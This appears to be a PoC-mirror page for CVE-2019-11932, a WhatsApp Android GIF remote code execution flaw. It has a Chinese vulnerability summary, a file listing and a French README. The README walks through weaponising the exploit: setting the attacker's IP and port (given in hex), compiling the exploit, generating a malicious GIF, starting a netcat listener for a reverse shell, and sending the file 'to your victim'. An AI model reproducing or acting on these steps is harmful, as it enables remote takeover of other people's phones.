Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-11932 PoC — Facebook WhatsApp 资源管理错误漏洞

Source
https://github.com/SmoZy92/CVE-2019-11932
Associated Vulnerability
Title:Facebook WhatsApp 资源管理错误漏洞 (CVE-2019-11932)
Description:Facebook WhatsApp是美国Facebook公司的一套利用网络传送短信的移动应用程序。该应用程序通过智能手机中的联络人信息,查找使用该软件的联络人传送文字、图片等。 基于Android平台的Facebook WhatsApp 2.19.244之前版本中的libpl_droidsonroids_gif 1.2.18之前版本的decoding.c文件的DDGifSlurp函数存在资源管理错误漏洞。远程攻击者可利用该漏洞执行任意代码或造成拒绝服务。
Readme
# CVE-2019-11932

Modifiez l'adresse d'écoute (celle de l'attaquant) ainsi que le port d'écoute dans le fichier exploit.c
<br />Code hexa suivant : 

3139 322e 3136  
382e 322e 3732 2034 3434 3420 


![alt text](https://i.imgur.com/v807Gam.png)
<br /> <br />

Compilez le code : <br />
gcc -o exploit egif_lib.c exploit.c <br /> <br />

Lancez le fichier compilé ./exploit exploit.gif<br />
c/c l'output dans un gif <br /> <br />

Lancez le listener netcat : <br />
nc -lvp 4444 <br /> <br />

Envoyez à votre victime ! <br /> <br />

**Versions impactées :**  2.19.230 et en dessous <br />
Officiellement patché dans la version 2.19.244

Source : https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ <br />

**Linkedin** : https://www.linkedin.com/in/thomas-lounis-749456175/
File Snapshot

 [4.0K]  /data/pocs/69eb33d46e1b6666473867902bddf8707ca0d1e0
├── [3.3K]  egif_lib.c
├── [5.2K]  exploit.c
├── [ 11K]  gif_lib.h
└── [ 795]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.